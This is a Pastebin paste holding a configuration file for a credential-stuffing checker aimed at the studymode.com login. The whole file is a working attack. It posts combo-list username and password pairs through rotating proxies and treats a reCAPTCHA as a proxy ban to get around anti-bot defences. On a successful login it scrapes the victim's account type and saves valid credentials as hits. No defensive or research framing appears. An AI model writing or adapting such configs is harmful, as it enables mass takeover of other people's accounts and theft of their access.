Advertisement
Guest User

Untitled

a guest
May 31st, 2018
206
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.08 KB | None | 0 0
  1. [General]
  2. UseProxy = True
  3. UseGlobalKeywords = True
  4. DefaultTimeout = 15
  5. UnbanAllProxiesWhenAllBannedAfter = 5.0
  6. HitsFolderName = studymode
  7. [Stage-1]
  8. Condition = Any
  9. Variable-1 = $Link = "https://www.studymode.com/login.php"
  10. Link = $Link#
  11. isFTP = False
  12. HTTPVersion = 1.1
  13. FollowRedirect = True
  14. HTTPRequestMethod = Post
  15. Timeout = 20
  16. Variable-2 = $Heads = "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\ncontent-type: application/x-www-form-urlencoded\nreferer: https://www.studymode.com/login.php\nupgrade-insecure-requests: 1\nuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\n"
  17. Headers = $Heads#
  18. Variable-3 = $PostContent = combinetext("username=",$combousername#,"&password=",$combopassword#)
  19. PostContent = $PostContent#
  20. Variable-4 = $FailKey = "Your email, username, or password is invalid"
  21. Variable-5 = $IndexOfFailKey = indexof($Stage1ResponseSource#,$FailKey#)
  22. Failure-Condition = $IndexOfFailKey# >= 0
  23. Variable-6 = $Bankey = "g-recaptcha"
  24. Variable-7 = $IndexofBankey = indexof($stage1responsesource#,$Bankey#)
  25. Ban-Condition = $IndexofBankey# >= 0
  26. Variable-8 = $IndexOfRetryKey = indexof($Stage1ResponseHeader#,"500 Internal Server Error")
  27. Retry-Condition = $IndexOfRetryKey# >= 0
  28. Variable-9 = $IndexOfSuccessKey = indexof($Stage1ResponseSource#,"Account Settings")
  29. [Stage-2]
  30. Condition = $IndexOfSuccessKey# >= 0
  31. Variable-1 = $Link = "https://www.studymode.com/account"
  32. Link = $Link#
  33. isFTP = False
  34. HTTPVersion = 1.1
  35. FollowRedirect = True
  36. HTTPRequestMethod = Get
  37. Timeout = 20
  38. Variable-2 = $SuccessKey = "Account Settings"
  39. Variable-3 = $IndexofSuccesskey2 = indexof($stage2responsesource#,$SuccessKey#)
  40. Success-Condition = $IndexOfSuccessKey2# >= 0
  41. Variable-4 = $sub = findtagval($stage2responsesource#,"<h4>Account Type</h4>","</span>")
  42. Variable-5 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, " sub",$sub#)
  43. Variable-6 = $IndexOfFreeKey = indexof($stage2responsesource#, "Basic member access")
  44. Free-Condition = $IndexOfFreeKeyKey# >= 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement